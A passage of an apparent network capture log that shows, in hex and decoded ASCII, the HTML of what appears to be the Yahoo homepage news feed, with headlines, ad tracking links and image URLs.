                                                                                                                                                                        Data Ascii: e9edb0edcc.cf.jpg" alt="" data-test-locator="stream-item-image"/></a></div> </div><div class="Pend(45px) Ov(h)"><div class="Fz(16px) Fw(b) Tt(c) D(ib) Mb(4px) Mend(9px) Lh(1) C($cat-politics)" data-test-locator="stream-item-category-label">Politics</div><
                                                                                                                                                                        2023-06-02 11:13:21 UTC613INData Raw: 65 73 70 6f 6e 64 73 20 54 6f 20 44 6f 6e 61 6c 64 20 54 72 75 6d 70 20 41 74 74 61 63 6b 20 57 69 74 68 20 31 20 4f 66 20 48 69 73 20 46 61 76 6f 72 69 74 65 20 52 6f 75 74 69 6e 65 73 3c 2f 73 70 61 6e 3e 3c 75 20 63 6c 61 73 73 3d 22 53 74 72 65 74 63 68 65 64 42 6f 78 22 3e 3c 2f 75 3e 3c 2f 61 3e 3c 2f 68 33 3e 3c 70 20 63 6c 61 73 73 3d 22 44 28 6e 29 2d 2d 6d 64 31 31 36 30 20 4c 69 6e 65 43 6c 61 6d 70 28 32 2c 33 38 70 78 29 20 66 69 6e 61 6e 63 65 2d 74 69 63 6b 65 72 2d 66 65 74 63 68 2d 73 75 63 63 65 73 73 5f 44 28 6e 29 20 73 75 62 2d 75 70 73 65 6c 6c 2d 66 65 74 63 68 2d 73 75 63 63 65 73 73 5f 44 28 6e 29 20 46 7a 28 31 34 70 78 29 20 4c 68 28 31 38 70 78 29 20 43 28 24 73 74 72 65 61 6d 53 75 6d 6d 61 72 79 43 6c 61 73 73 29 20 4d 28 30
                                                                                                                                                                        Data Ascii: esponds To Donald Trump Attack With 1 Of His Favorite Routines</span><u class="StretchedBox"></u></a></h3><p class="D(n)--md1160 LineClamp(2,38px) finance-ticker-fetch-success_D(n) sub-upsell-fetch-success_D(n) Fz(14px) Lh(18px) C($streamSummaryClass) M(0
                                                                                                                                                                        2023-06-02 11:13:21 UTC613INData Raw: 29 22 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 73 74 72 65 61 6d 2d 63 6c 75 73 74 65 72 2d 69 74 65 6d 20 46 6c 28 73 74 61 72 74 29 20 57 28 35 30 25 29 20 57 28 31 30 30 25 29 21 2d 2d 6d 64 31 31 36 30 20 4d 62 28 38 70 78 29 2d 2d 6d 64 31 31 36 30 22 20 64 61 74 61 2d 75 75 69 64 3d 22 32 31 66 31 35 64 64 66 2d 31 63 65 34 2d 33 64 36 37 2d 38 61 64 61 2d 30 33 62 30 34 32 36 32 32 35 34 31 22 20 64 61 74 61 2d 70 61 72 65 6e 74 2d 75 75 69 64 3d 22 39 36 61 30 66 36 36 30 2d 65 66 31 35 2d 33 63 63 30 2d 62 30 38 32 2d 33 33 31 65 35 65 30 37 35 62 33 62 22 20 64 61 74 61 2d 74 79 70 65 3d 22 31 22 20 64 61 74 61 2d 63 70 6f 73 3d 22 32 22 20 64 61 74 61 2d 63 70 6f 73 79 3d 22 38 22 20 64 61 74 61 2d 79 63 74 73 3d 22 30 30 31 30 30 30 36 36 31 2c 30
                                                                                                                                                                        Data Ascii: )"><li class="stream-cluster-item Fl(start) W(50%) W(100%)!--md1160 Mb(8px)--md1160" data-uuid="21f15ddf-1ce4-3d67-8ada-03b042622541" data-parent-uuid="96a0f660-ef15-3cc0-b082-331e5e075b3b" data-type="1" data-cpos="2" data-cposy="8" data-ycts="001000661,0
                                                                                                                                                                        2023-06-02 11:13:21 UTC615INData Raw: 54 45 30 4d 44 74 68 63 48 42 70 5a 44 31 35 64 47 46 6a 61 48 6c 76 62 67 2d 2d 2f 68 74 74 70 73 3a 2f 2f 6d 65 64 69 61 2e 7a 65 6e 66 73 2e 63 6f 6d 2f 65 6e 2f 70 65 6f 70 6c 65 5f 32 31 38 2f 38 63 35 32 61 65 64 36 65 30 32 34 63 30 61 61 32 32 64 39 31 31 63 61 36 35 33 36 33 35 63 39 2e 63 66 2e 6a 70 67 22 20 61 6c 74 3d 22 22 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 4c 68 28 31 35 70 78 29 20 43 28 2d 2d 63 6f 62 61 6c 74 29 20 43 28 2d 2d 64 6f 72 79 29 3a 68 20 46 77 28 62 29 20 4c 69 6e 65 43 6c 61 6d 70 28 33 2c 34 35 70 78 29 20 50 65 6e 64 28 31 30 70 78 29 2d 2d 6d 64 31 31 36 30 20 44 28 69 29 2d 2d 6d 64 31 31 36 30 22 3e 44 6f 6e 61 6c 64 20 54 72 75 6d 70 20 53 6c 61 6d 73 20 48 69 73 20 46 6f 72 6d 65 72 20 50 72 65 73 73 20 53 65
                                                                                                                                                                        Data Ascii: TE0MDthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/people_218/8c52aed6e024c0aa22d911ca653635c9.cf.jpg" alt=""/><div class="Lh(15px) C(--cobalt) C(--dory):h Fw(b) LineClamp(3,45px) Pend(10px)--md1160 D(i)--md1160">Donald Trump Slams His Former Press Se
                                                                                                                                                                        2023-06-02 11:13:21 UTC616INData Raw: 6d 70 25 35 44 3b 64 63 5f 6c 61 74 3d 3b 64 63 5f 72 64 69 64 3d 3b 74 61 67 5f 66 6f 72 5f 63 68 69 6c 64 5f 64 69 72 65 63 74 65 64 5f 74 72 65 61 74 6d 65 6e 74 3d 3b 74 66 75 61 3d 3f 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 4d 73 74 61 72 74 28 30 29 20 4d 79 28 30 29 20 4d 65 6e 64 28 31 30 70 78 29 20 4c 69 6e 65 43 6c 61 6d 70 28 33 2c 34 37 70 78 29 20 46 7a 28 31 32 70 78 29 20 46 77 28 62 29 20 43 28 2d 2d 63 6f 62 61 6c 74 29 20 70 75 62 2d 75 70 73 65 6c 6c 2d 69 74 65 6d 3a 68 5f 43 28 2d 2d 64 6f 72 79 29 22 20 64 61 74 61 2d 74 65 73 74 2d 6c 6f 63 61 74 6f 72 3d 22 73 74 72 65 61 6d 2d 72 65 6c 61 74 65 64 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 52 65 61 6c 20 6a 6f 75 72 6e 61 6c 69 73 6d 20 68 61 73 20 6e 65 76 65 72 20 62 65 65 6e 20
                                                                                                                                                                        Data Ascii: mp%5D;dc_lat=;dc_rdid=;tag_for_child_directed_treatment=;tfua=?"><div class="Mstart(0) My(0) Mend(10px) LineClamp(3,47px) Fz(12px) Fw(b) C(--cobalt) pub-upsell-item:h_C(--dory)" data-test-locator="stream-related-item-title">Real journalism has never been
                                                                                                                                                                        2023-06-02 11:13:21 UTC617INData Raw: 26 71 75 6f 74 3b 3a 7b 26 71 75 6f 74 3b 71 75 65 72 79 26 71 75 6f 74 3b 3a 7b 26 71 75 6f 74 3b 70 61 67 65 43 6f 6e 74 65 78 74 26 71 75 6f 74 3b 3a 7b 26 71 75 6f 74 3b 6c 75 26 71 75 6f 74 3b 3a 30 2c 26 71 75 6f 74 3b 70 61 67 65 54 79 70 65 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 6f 6d 65 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 73 69 74 65 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 66 70 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 70 70 4e 61 6d 65 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 6d 65 67 61 73 74 72 6d 26 71 75 6f 74 3b 7d 7d 7d 7d 22 20 64 61 74 61 2d 77 66 2d 62 6f 75 6e 64 61 72 79 3d 22 64 72 61 77 65 72 2d 66 65 74 63 68 2d 62 6f 75 6e 64 61 72 79 22 20 64 61 74 61 2d 77 66 2d 72 65 74 72 79 2d 63 6f 75 6e 74 3d 22 31 22 20 64 61 74 61 2d
                                                                                                                                                                        Data Ascii: &quot;:{&quot;query&quot;:{&quot;pageContext&quot;:{&quot;lu&quot;:0,&quot;pageType&quot;:&quot;home&quot;,&quot;site&quot;:&quot;fp&quot;,&quot;appName&quot;:&quot;megastrm&quot;}}}}" data-wf-boundary="drawer-fetch-boundary" data-wf-retry-count="1" data-
                                                                                                                                                                        2023-06-02 11:13:21 UTC618INData Raw: 4d 41 41 38 43 5a 70 66 6b 38 62 37 2e 36 54 78 6a 4a 70 6a 79 76 63 6c 48 43 56 34 66 56 4c 55 63 46 47 37 6b 69 58 59 43 52 4f 45 42 74 35 75 55 63 69 47 5f 39 44 75 58 61 6f 2d 26 61 6d 70 3b 61 70 3d 32 22 20 64 61 74 61 2d 77 66 2d 69 6d 61 67 65 2d 62 65 61 63 6f 6e 73 3d 22 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 50 79 28 31 32 70 78 29 20 50 6f 73 28 72 29 20 43 66 20 73 68 6f 77 2d 74 68 65 6e 2d 68 69 64 65 2d 61 64 2d 63 6f 6e 66 69 72 6d 61 74 69 6f 6e 5f 44 28 6e 29 20 68 69 64 65 2d 61 64 5f 44 28 6e 29 22 3e 3c 61 20 63 6c 61 73 73 3d 22 44 28 62 29 20 54 64 28 6e 29 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 65 61 70 2e 67 65 6d 69 6e 69 2e 79 61 68 6f 6f 2e 63 6f 6d 2f 6d 62 63 6c 6b 3f 62 76 3d 31 2e 30 2e 30 26 61 6d 70 3b 65
                                                                                                                                                                        Data Ascii: MAA8CZpfk8b7.6TxjJpjyvclHCV4fVLUcFG7kiXYCROEBt5uUciG_9DuXao-&amp;ap=2" data-wf-image-beacons=""><div class="Py(12px) Pos(r) Cf show-then-hide-ad-confirmation_D(n) hide-ad_D(n)"><a class="D(b) Td(n)" href="https://beap.gemini.yahoo.com/mbclk?bv=1.0.0&amp;e
                                                                                                                                                                        2023-06-02 11:13:21 UTC620INData Raw: 3b 73 6c 6b 3a 54 69 6e 61 20 54 75 72 6e 65 72 26 23 78 32 37 3b 73 20 42 61 6e 6b 20 42 61 6c 61 6e 63 65 20 53 74 75 6e 73 20 48 65 72 20 46 61 6d 69 6c 79 3b 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 74 61 62 69 6e 64 65 78 3d 22 2d 31 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 46 6c 28 73 74 61 72 74 29 20 4d 61 77 28 32 32 30 70 78 29 20 57 28 32 36 25 29 20 4d 65 6e 64 28 32 35 70 78 29 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 48 28 30 29 20 54 28 30 70 78 29 20 42 64 72 73 28 32 70 78 29 20 53 74 61 72 74 28 30 29 22 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 32 2e 31 31 25 22 3e 3c 69 6d 67 20 63 6c 61 73 73 3d 22 57 28 31 30 30 25 29 20 42 64 72 73 28 32 70 78 29 22 20 73 72 63 3d 22 68 74 74 70
                                                                                                                                                                        Data Ascii: ;slk:Tina Turner&#x27;s Bank Balance Stuns Her Family;" aria-hidden="true" tabindex="-1"><div class="Fl(start) Maw(220px) W(26%) Mend(25px)"><div class="H(0) T(0px) Bdrs(2px) Start(0)" style="padding-bottom:52.11%"><img class="W(100%) Bdrs(2px)" src="http
                                                                                                                                                                        2023-06-02 11:13:21 UTC621INData Raw: 53 41 43 73 31 41 38 4b 6f 65 4f 64 6b 5a 74 5a 38 36 4f 4b 50 57 44 4f 76 5f 6b 4c 69 53 34 58 55 51 53 4f 44 66 7a 39 47 67 44 33 34 38 48 5a 52 6a 34 2e 4a 6b 55 58 69 76 4f 48 52 71 34 68 76 4a 6a 69 6b 54 6d 78 6e 53 6c 65 65 31 62 68 64 51 4d 6b 61 71 6c 59 35 4e 33 6e 31 6b 2e 6f 6d 4b 6a 62 61 62 6b 42 64 7a 65 4b 56 39 6d 50 4a 53 78 49 46 70 67 42 30 39 4d 6c 57 33 4e 61 53 4f 6a 6e 49 64 72 39 73 70 41 65 61 62 33 37 56 48 37 70 72 35 52 36 4e 73 2e 71 32 52 59 76 71 56 44 6b 34 69 63 56 6b 49 4e 37 31 44 6c 69 47 6c 30 37 59 6d 6c 65 5a 4a 69 43 65 38 74 6c 67 79 45 39 67 51 4b 55 6d 4c 4b 78 6c 50 4e 4f 6c 34 51 39 5f 6a 58 6f 53 4b 44 30 6b 77 39 33 49 59 4a 70 37 77 52 4c 4a 37 6a 78 59 39 51 68 54 34 4f 36 64 4d 64 7a 55 39 45 50 71 4e 76
                                                                                                                                                                        Data Ascii: SACs1A8KoeOdkZtZ86OKPWDOv_kLiS4XUQSODfz9GgD348HZRj4.JkUXivOHRq4hvJjikTmxnSlee1bhdQMkaqlY5N3n1k.omKjbabkBdzeKV9mPJSxIFpgB09MlW3NaSOjnIdr9spAeab37VH7pr5R6Ns.q2RYvqVDk4icVkIN71DliGl07YmleZJiCe8tlgyE9gQKUmLKxlPNOl4Q9_jXoSKD0kw93IYJp7wRLJ7jxY9QhT4O6dMdzU9EPqNv
                                                                                                                                                                        2023-06-02 11:13:21 UTC622INData Raw: 6b 61 71 6c 59 35 4e 33 6e 31 6b 2e 6f 6d 4b 6a 62 61 62 6b 42 64 7a 65 4b 56 39 6d 50 4a 53 78 49 46 70 67 42 30 39 4d 6c 57 33 4e 61 53 4f 6a 6e 49 64 72 39 73 70 41 65 61 62 33 37 56 48 37 70 72 35 52 36 4e 73 2e 71 32 52 59 76 71 56 44 6b 34 69 63 56 6b 49 4e 37 31 44 6c 69 47 6c 30 37 59 6d 6c 65 5a 4a 69 43 65 38 74 6c 67 79 45 39 67 51 4b 55 6d 4c 4b 78 6c 50 4e 4f 6c 34 51 39 5f 6a 58 6f 53 4b 44 30 6b 77 39 33 49 59 4a 70 37 77 52 4c 4a 37 6a 78 59 39 51 68 54 34 4f 36 64 4d 64 7a 55 39 45 50 71 4e 76 30 62 41 75 54 6e 4e 62 42 49 6c 48 36 32 32 32 33 6a 5f 55 4f 6d 76 6d 72 5f 4b 6f 4d 5a 32 72 30 31 4b 2e 44 6c 34 66 74 5f 32 61 4c 71 38 68 30 33 62 5a 38 54 58 66 31 5a 44 68 55 59 66 55 49 41 53 32 48 70 47 49 71 4b 58 6d 50 48 45 68 71 6d 42
                                                                                                                                                                        Data Ascii: kaqlY5N3n1k.omKjbabkBdzeKV9mPJSxIFpgB09MlW3NaSOjnIdr9spAeab37VH7pr5R6Ns.q2RYvqVDk4icVkIN71DliGl07YmleZJiCe8tlgyE9gQKUmLKxlPNOl4Q9_jXoSKD0kw93IYJp7wRLJ7jxY9QhT4O6dMdzU9EPqNv0bAuTnNbBIlH62223j_UOmvmr_KoMZ2r01K.Dl4ft_2aLq8h03bZ8TXf1ZDhUYfUIAS2HpGIqKXmPHEhqmB
                                                                                                                                                                        2023-06-02 11:13:21 UTC624INData Raw: 67 63 28 2d 2d 77 68 69 74 65 29 22 20 64 61 74 61 2d 74 79 70 65 3d 22 31 22 20 64 61 74 61 2d 75 75 69 64 3d 22 63 33 32 64 30 39 30 38 2d 63 38 63 65 2d 33 30 35 39 2d 62 31 36 33 2d 64 65 39 62 33 63 39 61 66 66 33 61 22 20 64 61 74 61 2d 63 70 6f 73 3d 22 34 22 20 64 61 74 61 2d 63 70 6f 73 79 3d 22 31 31 22 20 64 61 74 61 2d 79 63 74 73 3d 22 30 30 31 30 30 30 33 39 35 2c 30 30 31 30 30 30 35 32 32 22 20 64 61 74 61 2d 77 69 6b 69 73 3d 22 4f 6c 69 76 65 72 5f 53 61 63 6b 73 2c 53 63 68 69 7a 6f 70 68 72 65 6e 69 61 2c 4d 65 6e 74 61 6c 5f 64 69 73 6f 72 64 65 72 2c 43 6f 6c 75 6d 62 69 61 5f 55 6e 69 76 65 72 73 69 74 79 2c 50 69 6c 67 72 69 6d 5f 50 73 79 63 68 69 61 74 72 69 63 5f 43 65 6e 74 65 72 2c 41 75 74 6f 69 6d 6d 75 6e 65 5f 64 69 73 65
                                                                                                                                                                        Data Ascii: gc(--white)" data-type="1" data-uuid="c32d0908-c8ce-3059-b163-de9b3c9aff3a" data-cpos="4" data-cposy="11" data-ycts="001000395,001000522" data-wikis="Oliver_Sacks,Schizophrenia,Mental_disorder,Columbia_University,Pilgrim_Psychiatric_Center,Autoimmune_dise
                                                                                                                                                                        2023-06-02 11:13:21 UTC625INData Raw: 7e 42 2f 5a 6d 6b 39 63 33 52 79 61 57 30 37 61 44 30 79 4e 44 59 37 63 54 30 34 4d 44 74 33 50 54 51 30 4d 44 74 68 63 48 42 70 5a 44 31 35 64 47 46 6a 61 48 6c 76 62 67 2d 2d 2f 68 74 74 70 73 3a 2f 2f 6d 65 64 69 61 2e 7a 65 6e 66 73 2e 63 6f 6d 2f 65 6e 2f 77 61 73 68 69 6e 67 74 6f 6e 5f 70 6f 73 74 5f 61 72 74 69 63 6c 65 73 5f 32 36 35 2f 62 37 38 37 37 33 36 31 62 37 66 62 35 36 65 30 30 38 37 35 39 64 34 64 66 33 39 62 38 30 38 61 2e 63 66 2e 6a 70 67 22 20 61 6c 74 3d 22 22 20 64 61 74 61 2d 74 65 73 74 2d 6c 6f 63 61 74 6f 72 3d 22 73 74 72 65 61 6d 2d 69 74 65 6d 2d 69 6d 61 67 65 22 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 50 65 6e 64 28 34 35 70 78 29 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d
                                                                                                                                                                        Data Ascii: ~B/Zmk9c3RyaW07aD0yNDY7cT04MDt3PTQ0MDthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/washington_post_articles_265/b7877361b7fb56e008759d4df39b808a.cf.jpg" alt="" data-test-locator="stream-item-image"/></a></div> </div><div class="Pend(45px)"><div class=
                                                                                                                                                                        2023-06-02 11:13:21 UTC626INData Raw: 64 3d 22 63 33 32 64 30 39 30 38 2d 63 38 63 65 2d 33 30 35 39 2d 62 31 36 33 2d 64 65 39 62 33 63 39 61 66 66 33 61 22 20 64 61 74 61 2d 73 74 6f 72 79 2d 6c 61 62 65 6c 3d 22 48 65 61 6c 74 68 22 3e 3c 73 70 61 6e 20 69 64 3d 22 73 74 72 65 61 6d 5f 69 74 65 6d 5f 74 69 74 6c 65 5f 34 22 3e 41 20 63 61 74 61 74 6f 6e 69 63 20 77 6f 6d 61 6e 20 61 77 61 6b 65 6e 65 64 20 61 66 74 65 72 20 32 30 20 79 65 61 72 73 2e 20 48 65 72 20 73 74 6f 72 79 20 6d 61 79 20 63 68 61 6e 67 65 20 70 73 79 63 68 69 61 74 72 79 2e 3c 2f 73 70 61 6e 3e 3c 75 20 63 6c 61 73 73 3d 22 53 74 72 65 74 63 68 65 64 42 6f 78 22 3e 3c 2f 75 3e 3c 2f 61 3e 3c 2f 68 33 3e 3c 70 20 63 6c 61 73 73 3d 22 4c 69 6e 65 43 6c 61 6d 70 28 32 2c 33 38 70 78 29 20 66 69 6e 61 6e 63 65 2d 74 69
                                                                                                                                                                        Data Ascii: d="c32d0908-c8ce-3059-b163-de9b3c9aff3a" data-story-label="Health"><span id="stream_item_title_4">A catatonic woman awakened after 20 years. Her story may change psychiatry.</span><u class="StretchedBox"></u></a></h3><p class="LineClamp(2,38px) finance-ti
                                                                                                                                                                        2023-06-02 11:13:21 UTC627INData Raw: 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 64 76 65 72 74 69 73 65 57 69 74 68 55 73 55 72 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 64 2e 63 6f 6d 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 79 61 68 6f 6f 2d 68 6f 6d 65 26 61 6d 70 3b 75 74 6d 5f 6d 65 64 69 75 6d 3d 72 65 66 65 72 72 61 6c 26 61 6d 70 3b 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 61 64 2d 66 65 65 64 62 61 63 6b 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 73 70 6f 6e 73 6f 72 65 64 55 72 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 2f 2f 6c 65 67 61 6c 2e 79 61 68 6f 6f 2e 63 6f 6d 2f 75 73 2f 65 6e 2f 79 61 68 6f 6f 2f 70 72 69 76 61 63 79 2f 61 64 69 6e 66 6f 2f 69 6e 64 65 78 2e 68 74 6d 6c 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 65 6e 61 62 6c 65 44
                                                                                                                                                                        Data Ascii: uot;,&quot;advertiseWithUsUrl&quot;:&quot;https://www.ad.com/?utm_source=yahoo-home&amp;utm_medium=referral&amp;utm_campaign=ad-feedback&quot;,&quot;sponsoredUrl&quot;:&quot;https://legal.yahoo.com/us/en/yahoo/privacy/adinfo/index.html&quot;,&quot;enableD
                                                                                                                                                                        2023-06-02 11:13:21 UTC628INData Raw: 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 73 74 72 65 61 6d 2d 69 74 65 6d 20 6a 73 2d 73 74 72 65 61 6d 2d 63 6f 6e 74 65 6e 74 20 50 6f 73 28 72 29 20 42 67 63 28 2d 2d 77 68 69 74 65 29 22 20 64 61 74 61 2d 74 79 70 65 3d 22 31 22 20 64 61 74 61 2d 75 75 69 64 3d 22 63 62 64 63 34 33 66 61 2d 30 37 62 34 2d 33 31 37 31 2d 39 37 63 33 2d 38 32 30 32 34 65 63 38 39 34 31 33 22 20 64 61 74 61 2d 63 70 6f 73 3d 22 35 22 20 64 61 74 61 2d 63 70 6f 73 79 3d 22 31 32 22 20 64 61 74 61 2d 79 63 74 73 3d 22 30 30 31 30 30 30 32 39 38 2c 30 30 31 30 30 30 33 34 36 2c 30 30 31 30 30 30 33 32 33 22 20 64 61 74 61 2d 77 69 6b 69 73 3d 22 42 65 72 6e 61 72 64 5f 41 72 6e 61 75 6c 74 2c 4c 56 4d 48 2c 45 6c 6f 6e 5f 4d 75 73
                                                                                                                                                                        Data Ascii: </div></div></li><li class="stream-item js-stream-content Pos(r) Bgc(--white)" data-type="1" data-uuid="cbdc43fa-07b4-3171-97c3-82024ec89413" data-cpos="5" data-cposy="12" data-ycts="001000298,001000346,001000323" data-wikis="Bernard_Arnault,LVMH,Elon_Mus
                                                                                                                                                                        2023-06-02 11:13:21 UTC630INData Raw: 77 22 20 74 61 62 69 6e 64 65 78 3d 22 2d 31 22 3e 3c 69 6d 67 20 63 6c 61 73 73 3d 22 57 28 31 30 30 25 29 20 42 64 72 73 28 32 70 78 29 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 2e 79 69 6d 67 2e 63 6f 6d 2f 75 75 2f 61 70 69 2f 72 65 73 2f 31 2e 32 2f 30 52 4f 55 4c 48 51 51 63 30 6b 78 55 30 4a 67 73 4e 6b 46 65 77 2d 2d 7e 42 2f 5a 6d 6b 39 63 33 52 79 61 57 30 37 61 44 30 7a 4f 44 59 37 63 54 30 34 4d 44 74 33 50 54 51 30 4d 44 74 68 63 48 42 70 5a 44 31 35 64 47 46 6a 61 48 6c 76 62 67 2d 2d 2f 68 74 74 70 73 3a 2f 2f 6d 65 64 69 61 2e 7a 65 6e 66 73 2e 63 6f 6d 2f 65 6e 2f 66 6f 72 74 75 6e 65 5f 31 37 35 2f 30 35 32 32 32 62 64 33 30 30 36 64 35 62 39 62 63 31 65 34 31 31 35 64 64 64 65 61 30 32 34 65 2e 63 66 2e 6a 70 67 22 20 61 6c 74 3d
                                                                                                                                                                        Data Ascii: w" tabindex="-1"><img class="W(100%) Bdrs(2px)" src="https://s.yimg.com/uu/api/res/1.2/0ROULHQQc0kxU0JgsNkFew--~B/Zmk9c3RyaW07aD0zODY7cT04MDt3PTQ0MDthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/fortune_175/05222bd3006d5b9bc1e4115dddea024e.cf.jpg" alt=
                                                                                                                                                                        2023-06-02 11:13:21 UTC631INData Raw: 6e 64 20 65 61 72 6e 69 6e 67 20 74 68 65 20 6e 69 63 6b 6e 61 6d 65 20 e2 80 98 54 68 65 20 54 65 72 6d 69 6e 61 74 6f 72 e2 80 99 2c 20 74 68 69 73 20 69 73 20 68 6f 77 20 4c 56 4d 48 20 43 45 4f 20 42 65 72 6e 61 72 64 20 41 72 6e 61 75 6c 74 20 6d 61 64 65 20 68 69 73 20 6d 6f 6e 65 79 3b 22 20 64 61 74 61 2d 68 6f 73 74 65 64 2d 74 79 70 65 3d 22 48 4f 53 54 45 44 22 20 64 61 74 61 2d 77 66 2d 63 61 61 73 2d 70 72 65 66 65 74 63 68 3d 22 31 22 20 64 61 74 61 2d 77 66 2d 63 61 61 73 2d 75 75 69 64 3d 22 63 62 64 63 34 33 66 61 2d 30 37 62 34 2d 33 31 37 31 2d 39 37 63 33 2d 38 32 30 32 34 65 63 38 39 34 31 33 22 20 64 61 74 61 2d 73 74 6f 72 79 2d 6c 61 62 65 6c 3d 22 42 75 73 69 6e 65 73 73 22 3e 3c 73 70 61 6e 20 69 64 3d 22 73 74 72 65 61 6d 5f 69
                                                                                                                                                                        Data Ascii: nd earning the nickname The Terminator, this is how LVMH CEO Bernard Arnault made his money;" data-hosted-type="HOSTED" data-wf-caas-prefetch="1" data-wf-caas-uuid="cbdc43fa-07b4-3171-97c3-82024ec89413" data-story-label="Business"><span id="stream_i
                                                                                                                                                                        2023-06-02 11:13:21 UTC632INData Raw: 74 65 72 2d 69 74 65 6d 22 3e 3c 61 20 63 6c 61 73 73 3d 22 6a 73 2d 63 6f 6e 74 65 6e 74 2d 76 69 65 77 65 72 20 72 61 70 69 64 6e 6f 66 6f 6c 6c 6f 77 20 77 61 66 65 72 2d 63 61 61 73 20 54 64 28 6e 29 20 44 28 69 62 29 20 56 61 28 74 29 20 57 28 39 30 25 29 20 4d 65 6e 64 28 31 30 25 29 20 43 28 2d 2d 64 6f 72 79 29 3a 68 20 43 28 2d 2d 62 6c 61 63 6b 29 22 20 64 61 74 61 2d 75 75 69 64 3d 22 34 64 61 64 30 38 31 31 2d 36 66 61 62 2d 33 30 62 63 2d 39 30 39 33 2d 36 61 64 63 39 65 61 35 66 37 66 38 22 20 64 61 74 61 2d 79 6c 6b 3d 22 69 74 63 3a 30 3b 65 6c 6d 3a 72 68 64 6c 6e 3b 62 70 6f 73 3a 31 3b 63 70 6f 73 3a 35 3b 63 70 6f 73 79 3a 31 33 3b 72 73 70 6e 73 3a 6e 61 76 3b 74 31 3a 61 33 3b 74 32 3a 73 74 72 6d 3b 74 33 3a 63 74 3b 63 63 6f 64 65
                                                                                                                                                                        Data Ascii: ter-item"><a class="js-content-viewer rapidnofollow wafer-caas Td(n) D(ib) Va(t) W(90%) Mend(10%) C(--dory):h C(--black)" data-uuid="4dad0811-6fab-30bc-9093-6adc9ea5f7f8" data-ylk="itc:0;elm:rhdln;bpos:1;cpos:5;cposy:13;rspns:nav;t1:a3;t2:strm;t3:ct;ccode
                                                                                                                                                                        2023-06-02 11:13:21 UTC634INData Raw: 6d 47 72 61 79 29 20 46 7a 28 31 31 70 78 29 20 4d 74 28 32 70 78 29 20 56 61 28 62 29 20 44 28 69 62 29 2d 2d 6d 64 31 31 36 30 22 20 64 61 74 61 2d 74 65 73 74 2d 6c 6f 63 61 74 6f 72 3d 22 73 74 72 65 61 6d 2d 63 6c 75 73 74 65 72 2d 70 75 62 22 3e 42 75 73 69 6e 65 73 73 20 49 6e 73 69 64 65 72 3c 2f 64 69 76 3e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 73 74 72 65 61 6d 2d 63 6c 75 73 74 65 72 2d 69 74 65 6d 20 46 6c 28 73 74 61 72 74 29 20 57 28 35 30 25 29 20 57 28 31 30 30 25 29 21 2d 2d 6d 64 31 31 36 30 20 4d 62 28 38 70 78 29 2d 2d 6d 64 31 31 36 30 22 20 64 61 74 61 2d 75 75 69 64 3d 22 32 31 62 30 61 39 33 61 2d 66 66 66 66 2d 33 62 31 61 2d 39 62 30 61 2d 62 34 32 30 35 34 63 66 39 32 33 35 22 20 64 61 74 61 2d 70 61 72 65
                                                                                                                                                                        Data Ascii: mGray) Fz(11px) Mt(2px) Va(b) D(ib)--md1160" data-test-locator="stream-cluster-pub">Business Insider</div></a></li><li class="stream-cluster-item Fl(start) W(50%) W(100%)!--md1160 Mb(8px)--md1160" data-uuid="21b0a93a-ffff-3b1a-9b0a-b42054cf9235" data-pare
                                                                                                                                                                        2023-06-02 11:13:21 UTC635INData Raw: 67 2e 63 6f 6d 2f 75 75 2f 61 70 69 2f 72 65 73 2f 31 2e 32 2f 31 71 42 61 47 6a 61 63 5f 6d 38 77 6f 30 71 5f 4d 37 69 64 7a 77 2d 2d 7e 42 2f 5a 6d 6b 39 63 33 52 79 61 57 30 37 61 44 30 78 4e 44 41 37 63 54 30 35 4d 44 74 33 50 54 45 30 4d 44 74 68 63 48 42 70 5a 44 31 35 64 47 46 6a 61 48 6c 76 62 67 2d 2d 2f 68 74 74 70 73 3a 2f 2f 6d 65 64 69 61 2e 7a 65 6e 66 73 2e 63 6f 6d 2f 65 6e 2f 62 62 63 5f 75 73 5f 61 72 74 69 63 6c 65 73 5f 39 39 35 2f 30 35 36 62 31 63 32 35 61 32 36 32 38 61 61 33 66 32 30 34 66 32 36 38 64 33 35 66 32 32 63 37 2e 63 66 2e 6a 70 67 22 20 61 6c 74 3d 22 22 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 4c 68 28 31 35 70 78 29 20 43 28 2d 2d 63 6f 62 61 6c 74 29 20 43 28 2d 2d 64 6f 72 79 29 3a 68 20 46 77 28 62 29 20 4c 69 6e
